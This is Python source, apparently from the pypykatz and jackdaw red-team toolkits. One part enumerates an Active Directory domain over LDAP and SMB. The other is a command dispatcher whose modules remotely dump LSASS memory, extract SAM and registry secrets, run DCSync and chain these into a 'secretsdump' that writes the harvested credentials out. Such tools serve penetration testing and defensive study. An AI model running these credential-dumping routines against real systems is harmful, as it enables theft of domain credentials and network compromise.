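        # the friendlier error below is returned instead of a raw KeyError.
        if logon['domain'] == '':
            logon['domain'] = os.environ.get('USERDOMAIN', '')
        if logon['logonserver'] == '':
            logon['logonserver'] = os.environ.get('LOGONSERVER',
                                                  '').replace('\\', '')
        if logon['domain'] == '' or logon['logonserver'] == '':
            return False, Exception(
                "Failed to find user's settings! Is this a domain user?")

        # Cheap reachability check: only network errors and the 2 s timeout
        # are treated as "server unreachable"; anything else propagates to
        # the outer handler so it is not mislabelled as an LDAP failure.
        try:
            reader, writer = await asyncio.wait_for(
                asyncio.open_connection(logon['logonserver'], 389), 2)
            writer.close()
            await writer.wait_closed()
        except (OSError, asyncio.TimeoutError):
            return False, Exception(
                "Failed to connect to server %s over LDAP" %
                (logon['logonserver']))

        if db_conn is None:
            stamp = datetime.datetime.now(
                datetime.timezone.utc).strftime("%Y%m%d_%H%M%S")
            db_loc = '%s_%s.db' % (logon['domain'], stamp)
            db_conn = 'sqlite:///%s' % db_loc
            create_db(db_conn)

        # NOTE(review): the 'jackdaw' password component looks like a
        # placeholder since SSPI authenticates with the logon token — confirm
        # against the URL parser before relying on it.
        ldap_url = 'ldap+sspi-ntlm://%s\\%s:jackdaw@%s' % (
            logon['domain'], logon['username'], logon['logonserver'])
        smb_url = 'smb2+sspi-kerberos://%s\\%s:jackdaw@%s' % (
            logon['domain'], logon['username'], logon['logonserver'])

        jdlogger.debug('LDAP connection: %s' % ldap_url)
        jdlogger.debug('SMB  connection: %s' % smb_url)
        if dns is None:
            from jackdaw.gatherer.rdns.dnstest import get_correct_dns_win
            srv_domain = '%s.%s' % (logon['logonserver'],
                                    logon['dnsdomainname'])
            dns = await get_correct_dns_win(srv_domain)
            if dns is None:
                # Not fatal: the gatherer is started without a DNS server.
                jdlogger.debug('Failed to identify DNS server!')
            else:
                dns = str(dns)
                jdlogger.debug('DNS server selected: %s' % dns)

        kerb_url = 'auto'
        with multiprocessing.Pool() as mp_pool:
            gatherer = Gatherer(db_conn,
                                work_dir,
                                ldap_url,
                                smb_url,
                                kerb_url=kerb_url,
                                ldap_worker_cnt=ldap_worker_cnt,
                                smb_worker_cnt=smb_worker_cnt,
                                mp_pool=mp_pool,
                                smb_gather_types=['all'],
                                progress_queue=None,
                                show_progress=show_progress,
                                calc_edges=True,
                                dns=dns,
                                no_work_dir=no_work_dir)
            _, err = await gatherer.run()
            if err is not None:
                raise err
            return True, None
    except Exception as e:
        return False, e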
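    async def run(self, args):
        """Execute the SMB sub-command selected by ``args.smb_module``.

        Every branch operates on ``args.url`` (an aiosmb connection URL).
        Results go to ``self.process_results`` for the LSASS-style modules,
        to ``args.outfile`` when one is given, or to stdout — as indented
        JSON when ``args.json`` is set. Recognised values: ``lsassfile``,
        ``lsassdump``, ``secretsdump``, ``dcsync``, ``regdump``, ``regfile``
        and ``console``; any other value does nothing.

        Args:
            args: Parsed command-line namespace. Attributes read depend on
                the branch: ``verbose``, ``url``, ``outfile``, ``json``,
                ``username``, ``system``/``sam``/``security``/``software``
                and ``commands``.
        """
        from aiosmb import logger as smblog

        # -v mapping for the aiosmb logger: silent (100, above CRITICAL) by
        # default, INFO for a single -v, and the raw numeric level
        # 5 - count beyond that (reaches 0 / NOTSET at five -v flags).
        if args.verbose == 0:
            smblog.setLevel(100)
        elif args.verbose == 1:
            smblog.setLevel(level=logging.INFO)
        else:
            smblog.setLevel(level=5 - args.verbose)

        def _emit(po, outfile_path):
            """Write a registry parser result to a file or to stdout.

            ``None`` results are skipped. With a truthy path ``po.to_file``
            picks the format from ``args.json``; otherwise the result is
            printed as JSON (``UniversalEncoder``) or via ``str``.
            """
            if po is None:
                return
            if outfile_path:
                po.to_file(outfile_path, args.json)
            elif args.json:
                print(
                    json.dumps(po.to_dict(),
                               cls=UniversalEncoder,
                               indent=4,
                               sort_keys=True))
            else:
                print(str(po))

        async def _write_secrets(secrets, outfile_path):
            """Stream items of the async iterator ``secrets`` to a file or stdout.

            When a path is given the file is held open only for the duration
            of the iteration and closed by the ``with`` block, so an error
            part-way through cannot leak the handle.
            """
            if outfile_path is None:
                async for secret in secrets:
                    print(str(secret))
                return
            with open(outfile_path, 'w', newline='') as outfile:
                async for secret in secrets:
                    outfile.write(str(secret))

        if args.smb_module == 'lsassfile':
            from pypykatz.smb.lsassutils import lsassfile
            mimi = await lsassfile(args.url)
            self.process_results({'smbfile': mimi}, [], args)

        elif args.smb_module == 'lsassdump':
            from pypykatz.smb.lsassutils import lsassdump
            mimi = await lsassdump(args.url)
            self.process_results({'smbfile': mimi}, [], args)

        elif args.smb_module == 'secretsdump':
            from pypykatz.smb.lsassutils import lsassdump
            from pypykatz.smb.regutils import regdump
            from pypykatz.smb.dcsync import dcsync

            # The three stages are independent: a failure in one is logged
            # and the next still runs. Each stage writes to its own suffix
            # of args.outfile when an output file is requested.
            try:
                mimi = await lsassdump(args.url)
                if mimi is not None:
                    self.process_results({'smbfile': mimi}, [],
                                         args,
                                         file_prefix='_lsass.txt')
            except Exception:
                logging.exception('[SECRETSDUMP] Failed to get LSASS secrets')

            try:
                _emit(await regdump(args.url),
                      args.outfile + '_registry.txt' if args.outfile else None)
            except Exception:
                logging.exception(
                    '[SECRETSDUMP] Failed to get registry secrets')

            try:
                dcsync_out = (args.outfile + '_dcsync.txt'
                              if args.outfile is not None else None)
                await _write_secrets(dcsync(args.url), dcsync_out)
            except Exception:
                logging.exception('[SECRETSDUMP] Failed to perform DCSYNC')

        elif args.smb_module == 'dcsync':
            from pypykatz.smb.dcsync import dcsync
            await _write_secrets(dcsync(args.url, args.username), args.outfile)

        elif args.smb_module == 'regdump':
            from pypykatz.smb.regutils import regdump
            _emit(await regdump(args.url), args.outfile)

        elif args.smb_module == 'regfile':
            from pypykatz.smb.regutils import regfile
            po = await regfile(args.url,
                               args.system,
                               sam=args.sam,
                               security=args.security,
                               software=args.software)
            _emit(po, args.outfile)

        elif args.smb_module == 'console':
            from aiosmb.examples.smbclient import amain
            la = SMBCMDArgs()
            la.smb_url = args.url
            la.verbose = args.verbose
            if args.commands:
                # Scripted session: 'help' stands alone, anything else gets
                # an implicit leading 'login' unless the user supplied one.
                if args.commands[0] == 'help':
                    la.commands = ['help']
                elif args.commands[0] == 'login':
                    la.commands = list(args.commands)
                else:
                    la.commands = ['login', *args.commands]

            await amain(la)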